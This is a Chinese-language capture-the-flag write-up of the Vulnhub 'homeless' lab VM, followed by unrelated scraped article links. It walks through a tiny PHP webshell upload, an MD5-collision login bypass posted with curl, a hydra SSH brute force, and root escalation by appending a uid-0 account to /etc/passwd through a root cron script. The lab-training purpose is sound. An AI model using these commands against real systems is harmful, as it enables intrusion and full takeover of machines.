信息搜集

nmap -sP 192.168.146.6

nmap -A -Pn 192.168.146.151

直接访问web服务。

大概浏览一下没发现什么,直接扫描下目录把dirb+bp。



BP具体操作:抓包-Target选项卡-右键该地址-Spider/discovery

看一眼robots.txt有一些提示

可能之后要爆破啥的,再看一看源码,发现有一段User-agent,可能是将我们的User-agent回显了,抓包看看



可以发现,User-agent确实回显了,但是改成其他的也是回显,没找到利用的方式。

然后按照CTF的套路猜测一下,可能需要一个特定的User-gent才能回显特定的内容。

再查看一下源码,看到一副很奇怪的图片,特别模糊,但是能大概看清上面的一行字,用来当User-agent



Cyberdog Sledding Portal 使用这行,发现回显了特定的东西。

给了一个url路径myuploader_priv,直接访问一下http://192.168.146.151/myuploader_priv/

getFlag

文件上传

随便上传一个普通的一句话,说文件太大了。。。



fuzz一下,发现最大上传文件大小为8字节。

使用最短的执行命令的方法 <?=`ls`;,将此写进short.php

访问http://192.168.146.151/files/short.php

访问887beed152a3e8f946857bade267bb19d159ef59.txt

再访问一下这个目录http://192.168.146.151/d5fa314e8577e3a7b8534a014b4dcb221de823ad/,找到后台

点击右上角needhint,得到index.php.bak查看index.php源码,主要看php代码

<?php
session_start();
error_reporting(0); if (@$_POST['username'] and @$_POST['password'] and @$_POST['code'])
{ $username = (string)$_POST['username'];
$password = (string)$_POST['password'];
$code = (string)$_POST['code']; if (($username == $password ) or ($username == $code) or ($password == $code)) { echo 'Your input can not be the same.'; } else if ((md5($username) === md5($password) ) and (md5($password) === md5($code)) ) {
$_SESSION["secret"] = '133720';
header('Location: admin.php');
exit(); } else { echo "<pre> Invalid password </pre>";
}
}
?>

逻辑就是username、password、code两两不相等,但是三者的md5相等。

md5碰撞

显然数组、0e头绕过是不可能的,看来只能用现有的工具进行md5碰撞,生成md5相同的东西了来绕过了。

github搜索一下,有现成的轮子https://github.com/thereal1024/python-md5-collision

看一下说明

可以看到使用gen_coll_test.py就行了

生成了很多out_test_xxx.txt,这些文件的md5的值肯定都是相同的,验证一下。(牛逼.jpg

curl命令传输文件

那么选三个文件,直接用curl命令传输过去就可以了,先查一查curl传输的用法。

参考https://ec.haxx.se/http/http-post

使用的参数:--data-urlencode HTTP POST data url encoded

curl --data-urlencode username@out_test_000.txt --data-urlencode password@out_test_001.txt --data-urlencode code@out_test_002.txt http://192.168.146.151/d5fa314e8577e3a7b8534a014b4dcb221de823ad/

emmm... 好像少了response看看该用什么参数。参数:-i, --include Include protocol response headers in the output

curl --data-urlencode username@out_test_000.txt --data-urlencode password@out_test_001.txt --data-urlencode code@out_test_002.txt http://192.168.146.151/d5fa314e8577e3a7b8534a014b4dcb221de823ad/ -i

好了,现在有cookie了,改一下就可以访问http://192.168.146.151/d5fa314e8577e3a7b8534a014b4dcb221de823ad/admin.php就进后台了。

命令执行

后台是一个命令执行的功能。

直接反弹shell,顺便提升为交互式shell



直接到/home目录下看到downfall用户,该用户目录下有很多文件。

todo.txt应该是提示,内容如下:

hey i am homeless guy. Now i living near python.

Try Harder!

Thanks.

看来要从某个python文件入手,那就来搜索一下。

find / -type f -user downfall 2>/dev/null #除了用户目录多了个邮件但是没权限

find / -type f -group downfall 2>/dev/null #查找属于downfall组的文件

发现一个py文件,进去看看。

emmm.. 然后就没什么思路了。

但是... 刚开始的提示rockyou好像还没有用上。。 难道是用来爆破downfall用户密码的?那就试试。

hydra -l downfall -P /usr/share/wordlists/rockyou.txt -t 5 ssh://192.168.146.151

过了一会就爆破出来了。。

密码:secretlyinlove

直接ssh连上去,得到真正的shell。

看一眼刚刚无权限打开的.secret_message,然后准备再去看py文件,然后就看到收到了邮件,肯定是有点什么了。

/var/mail下看看邮件

然后还可以看到这里是不能import 模块的

很明显了,这个homeless.py是一个以root权限运行的定时任务啊,那后续思路清晰了。

这里没有sudo命令,那直接用homeless写/etc/passwd文件即可。

先生成linux密码perl -e 'print crypt("A1oe",q($6$hoiLHdTI)) ."\n"'

$6$hoiLHdTI$OTp4A6JE3k0MJ0cNXOpKkZ/rSxGrTmTy3O12d5kD8BTZJa3P.SpeCW1WePO.lzPvbzPOzpMaY4Vt7rwSQ2BAm.

改python文件内容为

#! /usr/bin/python
f = open("/etc/passwd",'a')
f.write('A1oe:$6$hoiLHdTI$OTp4A6JE3k0MJ0cNXOpKkZ/rSxGrTmTy3O12d5kD8BTZJa3P.SpeCW1WePO.lzPvbzPOzpMaY4Vt7rwSQ2BAm.:0:0::/root:/bin/bash')
f.close()

(记得要加上第一行,不然无法解析然后疯狂报错)



等一分钟后看到用户A1oe已经写进去了



直接su A1oe password:A1oe登陆即可。

总结

刚开始的脑洞是真的大。。。(不知道是不是有别的思路,有的话请指教

收获了一个md5碰撞的好的轮子,以后ctf可以配合curl命令直接用了(curl真香

提权就没啥好说的了,比较常见,也就是修改root权限运行的定时文件进行提权操作。

Vulnhub homeless靶机渗透的更多相关文章

  1. VulnHub CengBox2靶机渗透

    ​本文首发于微信公众号:VulnHub CengBox2靶机渗透,未经授权,禁止转载. 难度评级:☆☆☆☆官网地址:https://download.vulnhub.com/cengbox/CengB ...

  2. Vulnhub DC-1靶机渗透学习

    前言 之前听说过这个叫Vulnhub DC-1的靶机,所以想拿来玩玩学习,结果整个过程都是看着别人的writeup走下来的,学艺不精,不过这个过程也认识到,学会了很多东西. 所以才想写点东西,记录一下 ...

  3. Vulnhub JIS-CTF-VulnUpload靶机渗透

    配置问题解决 参考我的这篇文章https://www.cnblogs.com/A1oe/p/12571032.html更改网卡配置文件进行解决. 信息搜集 找到靶机 nmap -sP 192.168. ...

  4. Vulnhub webdeveloper靶机渗透

    信息搜集 nmap -sP 192.168.146.0/24 #主机发现 nmap -A 192.168.146.148 #综合扫描 访问一下发现是wordpress,wp直接上wpscan wpsc ...

  5. Vulnhub DC-8靶机渗透

    信息搜集 nmap -sP 192.168.146.0/24 #主机发现 nmap -A 192.168.146.146 #Enable OS detection, version detection ...

  6. Vulnhub DC-7靶机渗透

    信息搜集 nmap -sP 192.168.146.0/24 #主机发现 nmap -A 192.168.146.144 #端口扫描 查看robots.txt,看看admin,403,其他没有什么可利 ...

  7. Vulnhub DC-3靶机渗透

    修改错误配置 打开了ova文件会发现,怎么也找不到DC-3的ip地址,估计是网卡出了问题. 那么就先配置下网卡. 进入上面这个页面之前按e. 将这里的ro 替换为 rw signie init=/bi ...

  8. Vulnhub DC-1靶机渗透

    简介 DC-1靶机是为了入门渗透测试的人准备的入门级的靶机,该靶机共有5个flag,其中最后一个finalflag是真的flag,其他都是提示性flag.这个靶机虽然简单,但是还是能学到一些基本的思路 ...

  9. Vulnhub bulldog靶机渗透

    配置 VM运行kali,桥接模式设置virtualbox. vbox运行靶机,host-only网络. 信息搜集 nmap -sP 192.168.56.0/24 或者 arp-scan -l #主机 ...

随机推荐

  1. [BlueZ] 3、使用 meshctl 连接控制一个 sig mesh 灯

    目录 前言 1.准备工作 2.meshctl 连接.配置.控制 sig mesh 灯 3.最终效果: LINKS 前言 本文介绍如何使用 meshctl 配对.连接.控制一个 sig mesh 球泡灯 ...

  2. 手撸MyBatis从配置文件到读出数据库的模拟实现

    手动模拟MyBatis入门案例的底层实现: 需要了解的关键技术: java反射.动态代理(comming soon) 一.Mybatis入门案例 点击此处跳过入门案例 首先看一下MyBatis最基础的 ...

  3. 普通索引和唯一索引如何选择(谈谈change buffer)

    假设有一张市民表(本篇只需要用其中的name和id_card字段,有兴趣的可以翻看“索引”篇,里面有建表语句) 每个人都有一个唯一的身份证号,且业务代码已经保证不会重复. 由于业务需求,市民需要按身份 ...

  4. Swift 4.0 高级-自定义操作符

    在Swift语言中,常见的操作符有+.-.*./.>.<.==.&&.||等等,如果不喜欢,你也可以定义自己喜欢的操作符. 操作符类型 中置运算符(infix operat ...

  5. MySQL 【进阶查询】

    数据类型介绍 整型 tinyint, # 占1字节,有符号:-128~127,无符号位:0~255 smallint, # 占2字节,有符号:-32768~32767,无符号位:0~65535 med ...

  6. Web_javaScript

    JavaScript 的使用 第1章 JavaScript起源 1.1 起源 N年前 拨号上网,网速很慢,数据提交到服务器端验证,体验很差 于是,就有人在想:能不能让这些数据在浏览器端验证呢? 20世 ...

  7. python对齐输出

    这个问题烦恼了挺久,一般情况下我都是用\t解决,但其实这样的办法并不是很nice,然后今天在写一个demo的时候实在看不下去,就百度科普了一波,确实是有比较nice的解决方案. 像这样: 令人十分难受 ...

  8. VirtualBox 安装 Centos8 使用 Xshell 连接

    1.下载CentOS CentOS下载地址:https://wiki.centos.org/Download 这里选择本地安装包,网络安装包在安装时需要在线下载资源比较慢 2.安装VirtualBox ...

  9. [状态压缩,折半搜索] 2019牛客暑期多校训练营(第九场)Knapsack Cryptosystem

    链接:https://ac.nowcoder.com/acm/contest/889/D来源:牛客网 时间限制:C/C++ 2秒,其他语言4秒 空间限制:C/C++ 262144K,其他语言52428 ...

  10. 5L-链表导论心法

    链表是比数组稍微复杂一点的数据结构,也是两个非常重要与基本的数据结构.如果说数组是纪律严明排列整齐的「正规军」那么链表就是灵活多变的「地下党」. 关注公众号 MageByte,有你想要的精彩内容. 链 ...